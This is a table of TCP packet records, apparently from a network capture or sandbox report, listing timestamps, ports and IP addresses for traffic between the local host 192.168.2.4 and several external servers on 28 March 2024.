Mar 28, 2024 09:14:59.107713938 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107724905 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107754946 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107758999 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107769966 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107795000 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107800007 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107821941 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107827902 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107845068 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107847929 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107868910 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107880116 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107882977 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107913017 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107927084 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107938051 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107956886 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107974052 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107974052 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108006001 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108019114 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108031034 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108053923 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108067036 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108078003 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108108997 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108120918 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108120918 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108141899 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108153105 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108158112 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108180046 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108186960 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108211994 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108227015 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108241081 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108244896 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108277082 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108279943 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108288050 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108318090 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108325005 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108349085 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108372927 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108385086 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108407021 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108431101 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108443975 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108479023 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108501911 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108514071 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108525038 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108539104 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108561039 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108563900 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108573914 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108593941 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108618021 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108623028 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108645916 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108659029 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108675003 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108685017 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108695984 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.108715057 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.108726978 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.116229057 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.117273092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.117302895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.117335081 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.117356062 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.125406027 CET	80	49756	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.125418901 CET	80	49756	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.125464916 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.125531912 CET	80	49756	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.125571966 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.125777006 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.126137972 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.131980896 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.132006884 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.132036924 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.132055044 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.134541988 CET	80	49757	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.134553909 CET	80	49757	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.134567976 CET	80	49757	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.134609938 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.134632111 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.134880066 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.135216951 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.146718979 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.146742105 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.146770000 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.146790028 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.161274910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.161293030 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.161356926 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.169595957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169621944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169642925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169661045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169675112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169714928 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169714928 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169750929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169883966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169899940 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169913054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169944048 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169944048 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169972897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.169985056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.169986010 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170026064 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170027018 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170541048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170557022 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170576096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170609951 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170609951 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170795918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170809031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170859098 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170871973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170885086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170885086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170922041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170933962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.170969009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170969009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.170990944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171027899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.171027899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.171752930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171766996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171801090 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171813011 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171823978 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.171833992 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.171833992 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172238111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172290087 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172302008 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172322035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172373056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172373056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172394991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172406912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172418118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172430992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.172456980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172456980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.172549009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173216105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173259974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173271894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173295021 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173295021 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173325062 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173336983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173348904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173357964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173357964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173393011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173393011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.173399925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.173639059 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174171925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174221992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174233913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174257994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174257994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174292088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174304008 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174314976 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174325943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174325943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174325943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.174361944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.174361944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175012112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175030947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175057888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175070047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175101995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175107956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175107956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175115108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175146103 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175167084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175167084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175662041 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.175870895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.175884008 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.175924063 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.175944090 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175945997 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.175956964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175973892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.175997972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176011086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176018000 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.176018000 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.176023960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176057100 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176074028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.176074028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.176242113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.176928997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176942110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176959038 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.176990986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177001953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177011013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177011013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177037954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177052021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177073002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177073002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177252054 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177810907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177829027 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177884102 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177885056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177886009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177897930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177910089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177922964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177939892 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177939892 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177939892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.177994967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.177994967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178770065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178785086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178817987 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178829908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178841114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178841114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178869009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178909063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178909063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178919077 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178931952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.178968906 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.178968906 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.179779053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179790020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179801941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179815054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179867029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.179867029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.179896116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179908037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179919958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.179945946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180155993 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180605888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180668116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180680037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180692911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180702925 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180702925 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180727005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180738926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180743933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180743933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180761099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.180783033 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180783033 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.180994034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.181581020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181592941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181605101 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181638956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.181643009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181654930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181668043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.181705952 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.181705952 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.181709051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182044983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.182480097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182547092 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.182563066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182575941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182589054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182600975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182616949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.182624102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182661057 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.182667971 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.182667971 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.182718992 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183464050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183475971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183511019 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.183511019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183516979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183528900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183562040 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183562040 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183568954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183581114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183613062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183625937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.183659077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.183659077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.186599016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.186611891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187141895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187155008 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187196970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187196970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187200069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187211037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187244892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187257051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187282085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187282085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187321901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187365055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187365055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187820911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187833071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187845945 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187864065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187889099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187889099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187896013 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187908888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187931061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.187935114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187977076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.187978029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188688993 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188699961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188750982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188760996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188761950 CET	80	49743	104.21.22.54	192.168.2.4
